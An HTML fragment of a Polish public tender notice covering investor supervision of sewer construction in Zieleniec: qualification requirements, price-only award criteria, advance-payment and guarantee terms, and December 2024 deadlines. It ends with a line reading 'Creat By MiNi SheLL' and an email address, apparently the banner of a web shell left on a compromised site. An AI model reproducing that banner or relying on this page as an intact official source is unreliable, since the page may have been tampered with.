cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot niniejszego zamówienia stanowi wykonanie zadania pn. : „Dokończenie budowy kanalizacji sanitarnej w Zieleńcu”<br/>realizowane w ramach Rządowego Funduszu Polski Ład: Programu Inwestycji Strategicznych. Przedmiot zamówienia jest<br/>podzielny na 2 części, w zakresie części 2, przedmiotem zamówienia jest pełnienie nadzoru inwestorskiego nad realizacja<br/>części nr 1.1.3Część nr 2 zamówienia obejmuje pełnienie nadzoru inwestorskiego nad realizacją zadań części nr 1<br/>niniejszego przedmiotu zamówienia w następującym zakresie:<br/>a) robót i prac wszystkich branż,<br/>b) robót i prac branży geodezyjnej,<br/>c) prac związanych z kosztorysowaniem,<br/>d) wszelkich inne prac objętych tych zadaniem.<br/>1)Pełnienie nadzoru w następujących specjalnościach (branżach):<br/>a)instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych<br/>bez ograniczeń<br/>2)Zakres i opis przedmiotu w ramach którego wymagane jest pełnienie nadzoru inwestorskiego przedstawiono w części nr 1<br/>przedmiotowego zamówienia.<br/>3)W ramach sprawowania nadzoru inwestorskiego zakres obejmie przede wszystkim:<br/>a) wypełnianie obowiązków, jakie zostały określone dla Inspektorów nadzoru inwestorskiego w ustawie Prawo budowlane, w<br/>art. 25,<br/>b) wypełnianie dodatkowych wymagań określonych przez Zamawiającego (zawartych w Załączniku we wzorze umowy,<br/>załączniku do SWZ) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71247000-1 - Nadzór nad robotami budowlanymi</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71520000-9 - Usługi nadzoru budowlanego</p> <p class="mb-0">71540000-5 - Usługi zarządzania budową</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">9 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert, które nie zostały odrzucone, na podstawie następujących kryteriów<br/>oceny: cena 100%. Zamawiający dokona oceny ofert przyznając punkty w ramach poszczególnych kryteriów oceny ofert, przyjmując<br/>zasadę, że 1% = 1 punkt.Za najkorzystniejszą ofertę zostanie uznana oferta, która otrzyma największą ilość punktów w kryterium<br/>cena.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> W zakresie części 1:<br/>a) wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest<br/>krótszy- w tym okresie, w sposób należyty, zgodnie z przepisami prawa budowlanego i prawidłowo ukończył: co najmniej<br/>dwa zamówienia polegające na wykonaniu budowy sieci kanalizacji sanitarnej na wartość nie mniejszą niż 2,0 mln zł wraz z<br/>podatkiem Vat każde zamówienie z osobna.<br/>b) dysponuje co najmniej jedną osobą, która będzie uczestniczyła w realizacji zadania w charakterze kierownika robót<br/>posiadającą uprawnienia budowlane o których mowa w ustawie z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U z 2016 r.,<br/>poz. 290 z późn. zm.) oraz w Rozporządzeniu Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. w sprawie<br/>samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2014 r., poz. 1278) lub odpowiadające im ważne uprawnienia<br/>budowlane wydane na podstawie uprzednio obowiązujących przepisów prawa, lub odpowiednich przepisów obowiązujących<br/>na terenie kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, uznanych przez właściwy organ, zgodnie z<br/>ustawą z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii<br/>Europejskiej (Dz. U z 2016 r., poz. 65), lub zamierzającymi świadczyć usługi transgraniczne w rozumieniu przepisów tej<br/>ustawy oraz art. 20a ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa<br/>oraz urbanistów (Dz. U. 2014r. poz. 1946), w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych,<br/>wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń w zakresie odpowiadającym przedmiotowi<br/>zamówienia<br/>W zakresie części 2:<br/>c) co najmniej jedną osobę, która będzie pełniła funkcje inspektora nadzoru w tym pełniącego funkcję koordynatora zespołu<br/>nadzorującego w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U z 2016 r., poz. 290 z późn. zm.) oraz w<br/>Rozporządzeniu Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych<br/>w budownictwie (Dz. U. z 2014 r., poz. 1278) lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie<br/>uprzednio obowiązujących przepisów prawa, lub odpowiednich przepisów obowiązujących na terenie kraju, w którym<br/>Wykonawca ma siedzibę lub miejsce zamieszkania, uznanych przez właściwy organ, zgodnie z ustawą z dnia 22 grudnia<br/>2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U z<br/>2016 r., poz. 65), lub zamierzającymi świadczyć usługi transgraniczne w rozumieniu przepisów tej ustawy oraz art. 20a<br/>ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U.<br/>2014r. poz. 1946), w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych,<br/>wodociągowych i kanalizacyjnych bez ograniczeń bez ograniczeń w zakresie odpowiadającym przedmiotowi zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie wymaga<br/>złożenia przez Wykonawcę podmiotowych środków dowodowych w tym zakresie. Wymagane jest natomiast złożenie Oświadczenia<br/>o niepodleganiu wykluczeniu z przedmiotowego postępowania załącznik nr 4 do Swz</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">zakresie części 1:<br/>1) wykaz zamówień wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed terminem składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy –w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz<br/>podmiotów, na rzecz których roboty te zostały wykonane (sporządzonego zgodnie z Załącznikiem Nr 7a do SWZ), oraz załączeniem<br/>dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje<br/>bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z<br/>przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów –inne odpowiednie dokumenty – w odniesieniu do<br/>warunku określonego w pkt. 6.2. ppkt. 4) lit. a SWZ<br/>W zakresie części 1 i 2:<br/>2) Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego zgodnie z warunkami udziału w<br/>postępowaniu w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi oraz<br/>projektowanie, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych<br/>do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do<br/>dysponowania tymi osobami sporządzonego zgodnie z Załącznikiem Nr 7 do SWZ – w odniesieniu do warunku określonego w pkt.<br/>6.2 ppkt 4 lit. b i c SWZ</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Na potrzeby oceny ofert oferta musi zawierać:<br/>1) Formularz ofertowy – do wykorzystania wzór (druk), stanowiący Załącznik nr 3 do SWZ (przy czym Wykonawca może<br/>sporządzić ofertę wg innego wzorca, powinna ona wówczas obejmować dane wymagane dla oferty w SWZ i załącznikach);<br/>2) Oświadczenie wykonawcy/wykonawcy wspólnie ubiegającego się o udzielenie zamówienia składane na podstawie art.<br/>125 ust. 1 ustawy Pzp Załącznik nr 6<br/>3) Uzasadnienie do zastrzeżenia informacji znajdujących się w ofercie jako tajemnica przedsiębiorstwa (jeżeli dotyczy).<br/>4) Potwierdzenie umocowania do działania w imieniu Wykonawcy lub podmiotu udostępniającego zasoby:<br/>a) Zamawiający w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy lub podmiotu udostępniającego zasoby<br/>jest umocowana do jego reprezentowania, żąda złożenia wraz z ofertą odpisu lub informacji z Krajowego Rejestru<br/>Sądowego, Centralnej Ewidencji I Informacji o Działalności Gospodarczej lub innego właściwego rejestru;b) Wykonawca lub<br/>podmiot udostępniający zasoby nie jest zobowiązany do złożenia dokumentów, o których mowa w lit a), jeżeli Zamawiający<br/>może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał<br/>dane umożliwiające dostęp do tych dokumentów.<br/>c) jeżeli w imieniu Wykonawcy lub podmiotu udostępniającego zasoby działa osoba, której umocowanie do jego<br/>reprezentowania nie wynika z dokumentów, o których mowa w lit a), Zamawiający żąda od Wykonawcy lub podmiotu<br/>udostępniającego zasoby złożenia wraz z ofertą pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do<br/>reprezentowania Wykonawcy.<br/>5) Pełnomocnictwo do reprezentowania wykonawców wspólnie ubiegających się o udzielenie zamówienia w postępowaniu o<br/>udzielenie zamówienia albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego<br/>(jeżeli dotyczy)<br/>6) Załącznik nr 7 Wzór wykazu osób<br/>7) Załącznik 7a Wykaz zamówień<br/>8)Załącznik nr 8 Zobowiązanie podmiotu udostępniającego zasoby<br/>9)Załącznik nr 9 Oświadczenie Rodo <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>9.2 W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>1)	oświadczenia o których mowa w pkt. 7.1 SWZ składa z ofertą każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu lub kryteriów selekcji w zakresie, w jakim każdy <br/> z wykonawców wykazuje spełnianie warunków udziału w postępowaniu lub kryteriów selekcji.<br/>2)	w przypadku, gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy. Oświadczenie należy złożyć wg wymogów załącznika nr 6 do SWZ. Oświadczenie to jest<br/> podmiotowym środkiem dowodowym.<br/>3)	zobowiązani są oni na wezwanie Zamawiającego, złożyć podmiotowe środki dowodowe, o których mowa w pkt. 7.3 SWZ, przy czym podmiotowe środki dowodowe, o których mowa w pkt. 7.3.1 SWZ składa odpowiednio<br/> Wykonawca/Wykonawcy, który/którzy wykazuje/-ą spełnienie warunku.<br/>9.3 Jeżeli została wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie <br/> zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> Dla części nr 1<br/>§ 5 Zaliczka i zabezpieczenie zwrotu zaliczki<br/>1. Zamawiający udziela wykonawcy zaliczki na poczet wykonania zamówienia w wysokości 2% ceny brutto wynagrodzenia<br/>wykonawcy tj. w kwocie ……………...<br/>2. Zaliczka zostanie Wykonawcy przekazana w formie jednorazowej płatności.<br/>3. Płatność zaliczki nastąpi przelewem na rachunek bankowy Wykonawcy……………………………….. nie później niż w<br/>terminie 30 dni po otrzymaniu faktury zaliczkowej, do której Wykonawca dołączy dokument potwierdzający zabezpieczenie<br/>zaliczki, o którym mowa w ust. 6.<br/>4. Faktura zaliczkowa zostanie wystawiona z uwzględnieniem przepisów art. 108a<br/>ust. 1a ustawy o podatku od towarów i usług i będzie zawierała adnotację „mechanizm podzielonej płatności”.<br/>5. Pozostałe wynagrodzenie Wykonawcy zostanie zapłacone po dokonaniu odbioru końcowego. Zapłacona zaliczka<br/>zostanie zaliczona, po wykonaniu całości zamówienia, na poczet wynagrodzenia Wykonawcy.<br/>6. Wykonawca zobowiązany jest do wniesienia zabezpieczenia zaliczki zgodnie z art. 442 ust. 3 ustawy Prawo zamówień<br/>publicznych.<br/>7. Zabezpieczenie zaliczki ustala się w wysokości odpowiadającej 100 % kwoty zaliczki.<br/>8. Zabezpieczenie zaliczki może być wniesione w formie:<br/>a) poręczeń bankowych lub poręczeń spółdzielczej kasy oszczędnościowo-kredytowej, z tym że zobowiązanie kasy jest<br/>zawsze zobowiązaniem pieniężnym;<br/>b) gwarancji bankowych;<br/>c) gwarancji ubezpieczeniowych;<br/>d) poręczeń udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości;<br/>9. Zabezpieczenie musi być ustanowione zgodnie z prawem polskim i podlegać prawu polskiemu.<br/>10. Dokument gwarancji/poręczenia wymaga akceptacji Zamawiającego przed jego podpisaniem przez<br/>gwaranta/poręczyciela.<br/>11. Dokument gwarancji/poręczenia wystawiony przez podmiot zagraniczny powinien posiadać tłumaczenie przysięgłe na<br/>język polski<br/>12. W przypadku, gdy dokumenty potwierdzające wniesienie zabezpieczenia zaliczki wystawi podmiot zagraniczny<br/>dokumenty te winny zawierać klauzulę, iż wszelkie prawa i obowiązki wynikające z wystawionych dokumentów podlegają<br/>prawu polskiemu, spory będą rozstrzygane przez polski sąd.<br/>13. Zamawiający nie dokona wypłaty zaliczki w sytuacji braku lub niezgodnego z umową lub przepisami ustawy Praw<br/>zamówień publicznych lub z SWZ jej zabezpieczenia.<br/>14. Dokument potwierdzający zabezpieczenie zaliczki musi zawierać bezwarunkowe i nieodwołalne zobowiązanie<br/>gwaranta/poręczyciela do wypłaty na rzecz zamawiającego kwoty zaliczki na żądanie zamawiającego zawierające<br/>oświadczenie, że Wykonawca, pomimo pisemnego wezwania, nie rozliczył przekazanej mu zaliczki, zgodnie z umową.<br/>15. Zamawiający dokona zwrotu zabezpieczenia zaliczki w terminie 30 dni od dnia uznania, że umowa została wykonana<br/>należycie.<br/>16. W przypadku zmiany umowy polegającej na przedłużeniu terminu wykonania świadczenia wykonawcy Wykonawca<br/>zobowiązany jest – przed podpisaniem aneksu - wnieść nowe zabezpieczenie lub aneks do zabezpieczenia uwzględniający<br/>nowy termin wykonania świadczenia i dokonani odbioru wykonanych robót.<br/>17. Brak wykonania zobowiązania wskazanego w ust. 16 będzie podstawą do odmowy podpisania aneksu do umowy przez<br/>zamawiającego.<br/>Dla części nr 2 Dla części nr 2 zapisy w § 5 Zaliczka i zabezpieczenie zwrotu zaliczki, Załącznik nr 1.2 Wzór umowy <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 18<br/>Zmiany umowy<br/>5. Oprócz przypadków, o których mowa w art. 454 i 455 ustawy – Prawo zamówień publicznych, strony dopuszczają<br/>możliwość wprowadzania zmiany umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia którejkolwiek z następujących okoliczności:<br/>1) przedłużenie terminu realizacji zamówienia, o którym mowa w § 2 ust. 1, może nastąpić w przypadku wystąpienia<br/>okoliczności siły wyższej, przez którą należy rozumieć zdarzenia niezależne od żadnej ze stron, zewnętrzne, niemożliwe do<br/>zapobieżenia, które nastąpiło po dniu wejścia w życie umowy, w szczególności: wojny, akty terroryzmu, klęski żywiołowe,<br/>strajki oraz akty władzy i administracji publicznej, przy czym przedłużenie terminu realizacji zamówienia nastąpi o liczbę dni,<br/>odpowiadającą okresowi występowania okoliczności siły wyższej;<br/>2) przedłużenie terminu realizacji zamówienia, o którym mowa w § 2 ust. 1, może nastąpić w przypadku skierowania przez<br/>Zamawiającego do Wykonawcy pisemnego żądania wstrzymania robót budowlanych, stanowiących przedmiot zamówienia<br/>lub wydania zakazu prowadzenia robót budowlanych, stanowiących przedmiot zamówienia przez organ administracji<br/>publicznej lub eksploatorów infrastruktury, o ile żądanie lub wydanie zakazu nie nastąpiło z przyczyn, za które Wykonawca<br/>ponosi odpowiedzialność, przy czym przedłużenie terminu realizacji zamówienia nastąpi o liczbę dni, odpowiadającą<br/>okresowi na jaki Wykonawcy nakazano wstrzymanie robót budowlanych lub zakazano prowadzenia robót budowlanych;<br/>3) przedłużenie terminu realizacji zamówienia, o którym mowa w § 2 ust. 1, może nastąpić w przypadku wystąpienia kolizji z<br/>instalacjami wewnętrznymi lub zewnętrznymi nieujawnionymi w dokumentacji projektowej, lub innymi robotami<br/>prowadzonymi przez innego wykonawcę, przy czym przedłużenie terminu realizacji zamówienia nastąpi o liczbę dni<br/>niezbędną Wykonawcy na usunięcie kolizji z instalacjami wewnętrznymi nieujawnionymi w dokumentacji projektowej lub o<br/>liczbę dni nie-zbędnych do wykonania robót przez innego wykonawcę – o ile usunięcie kolizji wymagać będzie przedłużenia<br/>terminu realizacji;<br/>Ze względu na ograniczoną ilość miejsca dalsza część w załączniku nr 1.1 dla części nr 1 i w Załączniku nr 1.2 dla części nr<br/>2 Wzór umowy par. 18. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-12-27 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę poprzez Platformę e-Zamówienia za pośrednictwem zakładki „Oferty/wnioski”, widocznej w podglądzie postępowania po zalogowaniu się na konto Wykonawcy, na stronie prowadzonego postępowania</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-12-27 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-01-26</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com